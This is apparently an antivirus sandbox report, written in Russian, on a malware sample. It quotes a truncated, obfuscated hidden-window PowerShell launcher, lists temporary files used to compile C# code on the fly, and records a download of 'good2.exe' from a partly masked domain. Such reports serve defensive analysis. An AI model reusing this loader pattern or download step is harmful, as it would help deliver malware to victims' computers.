Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function jc57f4 {param($x315a)$n1b663='j574a';$h6ea66='';for ($i=0; $i -lt $x315a.length;$i+=2){$t9827=[convert]::ToByte($x315a.Substring($i,2),16);$h6ea66+=[char]($t9827 ...
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\doypjmpj.0.cs
- %TEMP%\doypjmpj.cmdline
- %TEMP%\doypjmpj.out
- %TEMP%\csce48a.tmp
- %TEMP%\rese49b.tmp
- %TEMP%\doypjmpj.dll
Удаляет следующие файлы
- %TEMP%\rese49b.tmp
- %TEMP%\csce48a.tmp
- %TEMP%\doypjmpj.cmdline
- %TEMP%\doypjmpj.pdb
- %TEMP%\doypjmpj.out
- %TEMP%\doypjmpj.dll
- %TEMP%\doypjmpj.0.cs
Сетевая активность
TCP
Запросы HTTP GET
- http://pl##tech.id/fi/good2.exe
UDP
- DNS ASK pl##tech.id
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -WindowStyle Hidden function jc57f4 {param($x315a)$n1b663='j574a';$h6ea66='';for ($i=0; $i -lt $x315a.length;$i+=2){$t9827=[convert]::ToByte($x315a.Substring($i,2),16);$h6ea66+=[char]($t9827 ...' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\doypjmpj.cmdline"' (со скрытым окном)
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE49B.tmp" "%TEMP%\CSCE48A.tmp"' (со скрытым окном)
Запускает на исполнение
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\csc.exe' /noconfig /fullpaths @"%TEMP%\doypjmpj.cmdline"
- '%WINDIR%\microsoft.net\framework64\v2.0.50727\cvtres.exe' /NOLOGO /READONLY /MACHINE:IX86 "/OUT:%TEMP%\RESE49B.tmp" "%TEMP%\CSCE48A.tmp"
